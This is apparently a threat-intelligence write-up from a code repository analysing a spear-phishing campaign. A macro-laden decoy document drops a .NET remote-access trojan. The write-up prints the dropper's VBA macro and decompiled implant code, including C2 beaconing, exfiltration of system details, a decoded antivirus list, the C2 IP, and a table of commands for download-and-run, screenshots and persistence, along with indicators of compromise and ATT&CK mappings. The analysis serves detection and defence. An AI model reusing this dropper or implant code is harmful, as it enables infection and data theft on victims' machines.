ch0ic3/CyberThreatIntel

Fork 0

StrangerealIntel 938f8846bf

Update analysis.md

2020-01-23 00:55:52 +01:00

11 KiB

Raw Blame History

Not as so transparent

Malware analysis
Threat Intelligence
Cyber kill chain
Indicators Of Compromise (IOC)
Yara Rules
References MITRE ATT&CK Matrix
Knowledge Graph
Links

Malware analysis

The initial vector is from a decoy document probably shared from a spear-phishing, this document have two links for download additionnal informations. The both maldoc , this use a macro for extract and execute the PE file depends on the version of the operating system.

Sub unMoferzip(Fname As Variant, FileNameFolder As Variant)
 Dim FSO As Object
 Dim oApp As Object
 'Extract the files into the Destination folder
 Set oApp = CreateObject("Shell.Application")
 oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4
End Sub

Sub MoferfileLdr()
 Dim path_Mofer_file As String
 Dim file_Mofer_name  As String
 Dim zip_Mofer_file  As Variant
 Dim fldr_Mofer_name  As Variant
 file_Mofer_name = "ulhtagnias"
 fldr_Mofer_name = Environ$("ALLUSERSPROFILE") & "\DeIA-WIR\"
 If Dir(fldr_Mofer_name, vbDirectory) = "" Then
  MkDir (fldr_Mofer_name)
 End If
 zip_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".zip"
 path_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".exe"
 Dim ar1Mofer() As String
 Dim btsMofer() As Byte
 If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
  ar1Mofer = Split(UserForm1.TextBox2.Text, "'")
 Else
  ar1Mofer = Split(UserForm1.TextBox1.Text, "'")
 End If
 Dim linMofer As Double
 linMofer = 0
 For Each vl In ar1Mofer
  ReDim Preserve btsMofer(linMofer)
  btsMofer(linMofer) = CByte(vl)
  linMofer = linMofer + 1
 Next
  Open zip_Mofer_file For Binary Access Write As #2
   Put #2, , btsMofer
 Close #2
 If Len(Dir(path_Mofer_file)) = 0 Then
  Call unMoferzip(zip_Mofer_file, fldr_Mofer_name)
 End If
   Shell path_Mofer_file, vbNormalNoFocus
End Sub

The .NET implant begin to load the recon actions, push a timer for sleep the process and try to join the C2.

public void ulhtagniasdo_start()
{
 ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[0];
 this.ulhtagniasrunTime = DateTime.Now;
 this.ulhtagniasUPC = new ulhtagniasMYINF();
 this.ulhtagniasCMD = new ulhtagniasOCMD(this);
 this.ulhtagniasHD.iserver = this;
 this.ulhtagniasHD.ulhtagniasmainPath = ulhtagniasCONF.ulhtagniasget_mpath();
 TimerCallback callback = new TimerCallback(this.ulhtagniaslookup_connect);
 System.Threading.Timer ulhtagniastimer = new System.Threading.Timer(callback, this.ulhtagniasStateObj, 32110, 36110);
 this.ulhtagniasStateObj.ulhtagniastimer = ulhtagniastimer;
}

Once the connexion is etablish with the C2, this send the informations of user, system, sensible AV (who detect it easily) and this repertory (here from a trace of the TCP stream of an Anyrun sandbox)

.....info=command.....ulhtagnias-info=user8....|USER-PC|admin||6>1|S.P.1.3|| ||C:\ProgramData\DeIA-WIR\.....clping=Ping.....clping=Ping

private void ulhtagniasuser_info()
{
 string text = string.Concat(new string[]
 {
  this.ulhtagniasUPC.ulhtagniaslancard,"|",this.ulhtagniasUPC.ulhtagniascname,"|",
  this.ulhtagniasUPC.ulhtagniasuname,"|",this.ulhtagniasUPC.ulhtagniasuip,"|",
  ulhtagniasCONF.ulhtagniasOsname(),"|",this.ulhtagniasUPC.ulhtagniasapver,"|",
  ulhtagniasCONF.ulhtagniasloadAV()
 });
 text += "| !ulhtagnias".Split(new char[]{'!'})[0];
 text = text + "|" + this.ulhtagniasUPC.ulhtagniasclientNum;
 text = text + "|" + ulhtagniasCONF.ulhtagniasget_mpath();
 byte[] byteArray = ulhtagniasCONF.getByteArray(text);
 this.ulhtagniaspush_data(byteArray, "ulhtagnias-info=user|ulhtagnias".Split(new char[]{'|'})[0], false);
} 

public static string ulhtagniasOsname()
{
 string result;
 try
 {
  OperatingSystem osversion = Environment.OSVersion;
  result = osversion.Version.Major.ToString() + ">" + osversion.Version.Minor.ToString();
 }
 catch {result = "6>1!ulhtagnias".Split(new char[]{'!'})[0];}
 return result;
}

The name of PE file is used as identifier and the command by a couple {nameimplant-command}.This can perform the actions by the following commands :

Command	Description
-procl	Get the list of process
-thumb	Get info of a picture
-clping	Check activity
-putsrt	Push the persistence in a Run key
-filsz	Get infos of a specific file
-rupth	Push the data received
-dowf	Save to a file the data pushed on the system
-endpo	Kill a process
-scrsz	Get the size of the screen
-cownar	Download and run a executable file
-cscreen	Get a screenshot
-dirs	List all the drives and directories
-stops	stop the mod for get periodical screenshot
-scren	start the mod for get periodical screenshot
-cnls	Allow index, send data and disable continue screenshot
-udlt	Download and execute an executable for remove an user ?
-delt	Delete a specific file
-listf	List files
-file	Get a specific file
-info	Get user and system infos, check if the AV is on blacklist
-runf	Execute a specific file
-dowr	Download a file on the system
-fldr	Get folders and go silent mod

On the RAT, one of two byte array is used for triggered the detection of a sensible AV

public static byte[] encAvs = new byte[]{98,100,115,115,61,66,105,116,32,68,101,102,101,110,100,101,114,44,111,110,108,105,110,101,110,116,61,81,46,72,101,97,108,44,98,100,97,103,101,110,116,61,66,105,116,32,68,101,102,101,110,100,101,114,32,65,103,101,110,116,44,109,115,115,101,99,101,115,61,77,83,32,69,115,115,101,110,116,105,97,108,115,44,102,115,115,109,51,50,61,70,83,101,99,117,114,101,44,97,118,112,61,75,97,115,112,101,114,115,107,121,44,97,118,103,110,116,61,65,118,105,114,97,44,115,112,98,98,99,115,118,99,61,83,121,109,97,110,116,101,99,44,117,112,100,97,116,101,114,117,105,61,77,99,65,102,101,101,44,97,118,103,117,105,61,65,86,71,44,97,118,103,99,99,61,65,86,71,44,109,98,97,109,61,65,110,116,32,77,97,108,119,97,114,101,44,97,118,97,115,116,117,105,61,65,118,97,115,116,44,97,118,97,115,116,61,65,118,97,115,116};

This can easily viewable in oneliner (UTF8 + Getstring) and show the list of sensible AV to detect

PS> ([System.Text.Encoding]::UTF8.GetString($encAvs)).split(",")
bdss=Bit Defender
onlinent=Q.Heal
bdagent=Bit Defender Agent
msseces=MS Essentials     
fssm32=FSecure
avp=Kaspersky
avgnt=Avira
spbbcsvc=Symantec
updaterui=McAfee
avgui=AVG
avgcc=AVG
mbam=Ant Malware
avastui=Avast
avast=Avast

With the same logic, we can get the content of the second array which get the IP of the C2 to contact

PS> ([System.Text.Encoding]::UTF8.GetString($tab)).split(",")   
198.46.177.73

Some identifiers like name of user, defaultIP and logname can be found

public static string ulhtagniasmainApp = "ulhtagnias|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniaspc_id = "vhldsp|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasremvUser = "drlarmn|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasfilesLogs = "rndlbes".Split(new char[]{'|'})[0];}
public static string ulhtagniasdefaultP = "122.200.110.101|ulhtagnias".Split(new char[]{'|'})[0];

This connect on the default port (6421) and can switch depending on the needs of the operations

public static int[] ports = new int[]{6421,4920,10422,14823,16824};
public void ulhtagniasports_switch()
 {
  try
  {
   this.port_sn++;
   ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[this.port_sn];
   if (this.port_sn >= ulhtagniasCONF.ports.Length - 1){this.port_sn = 0;}
  }
 catch{this.port_sn = 0;}
 }

Threat Intelligence

Cyber kill chain

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)

Indicator	Description
Criteria of Army Officers.doc	1cb726eab6f36af73e6b0ed97223d8f063f8209d2c25bed39f010b4043b2b8a1
ulhtagnias.exe	d2c46e066ff7802cecfcb7cf3bab16e63827c326b051dc61452b896a673a6e67
198.46.177.73	IP C2

The IOC can be exported in JSON

References MITRE ATT&CK Matrix

Enterprise tactics	Technics used	Ref URL
Discovery	Query Registry	https://attack.mitre.org/techniques/T1012/
C&C	Uncommonly Used Port	https://attack.mitre.org/techniques/T1065/
Defense Evasion	Scripting	https://attack.mitre.org/techniques/T1064/
Execution	Scripting	https://attack.mitre.org/techniques/T1064/

11 KiB

Raw Blame History

Not as so transparent

Table of Contents

Malware analysis

The initial vector is from a decoy document probably shared from a spear-phishing, this document have two links for download additionnal informations. The both maldoc , this use a macro for extract and execute the PE file depends on the version of the operating system.

The .NET implant begin to load the recon actions, push a timer for sleep the process and try to join the C2.

Once the connexion is etablish with the C2, this send the informations of user, system, sensible AV (who detect it easily) and this repertory (here from a trace of the TCP stream of an Anyrun sandbox)

The name of PE file is used as identifier and the command by a couple {nameimplant-command}.This can perform the actions by the following commands :

On the RAT, one of two byte array is used for triggered the detection of a sensible AV

This can easily viewable in oneliner (UTF8 + Getstring) and show the list of sensible AV to detect

With the same logic, we can get the content of the second array which get the IP of the C2 to contact

Some identifiers like name of user, defaultIP and logname can be found

This connect on the default port (6421) and can switch depending on the needs of the operations

Threat Intelligence

Cyber kill chain

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)

The IOC can be exported in JSON

References MITRE ATT&CK Matrix

This can be exported as JSON format Export in JSON

Yara Rules

A list of YARA Rule is available here

Knowledge Graph

The following diagram shows the relationships of the techniques used by the groups and their corresponding malware:

Links

Original tweet:

Links Anyrun:

Resources :

11 KiB Raw Blame History

Not as so transparent

Table of Contents

Malware analysis

The initial vector is from a decoy document probably shared from a spear-phishing, this document have two links for download additionnal informations. The both maldoc , this use a macro for extract and execute the PE file depends on the version of the operating system.

The .NET implant begin to load the recon actions, push a timer for sleep the process and try to join the C2.

Once the connexion is etablish with the C2, this send the informations of user, system, sensible AV (who detect it easily) and this repertory (here from a trace of the TCP stream of an Anyrun sandbox)

The name of PE file is used as identifier and the command by a couple {nameimplant-command}.This can perform the actions by the following commands :

On the RAT, one of two byte array is used for triggered the detection of a sensible AV

This can easily viewable in oneliner (UTF8 + Getstring) and show the list of sensible AV to detect

With the same logic, we can get the content of the second array which get the IP of the C2 to contact

Some identifiers like name of user, defaultIP and logname can be found

This connect on the default port (6421) and can switch depending on the needs of the operations

Threat Intelligence

Cyber kill chain

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)

The IOC can be exported in JSON

References MITRE ATT&CK Matrix

This can be exported as JSON format Export in JSON

Yara Rules

A list of YARA Rule is available here

Knowledge Graph

The following diagram shows the relationships of the techniques used by the groups and their corresponding malware:

Links

Original tweet:

Links Anyrun:

Resources :

11 KiB

Raw Blame History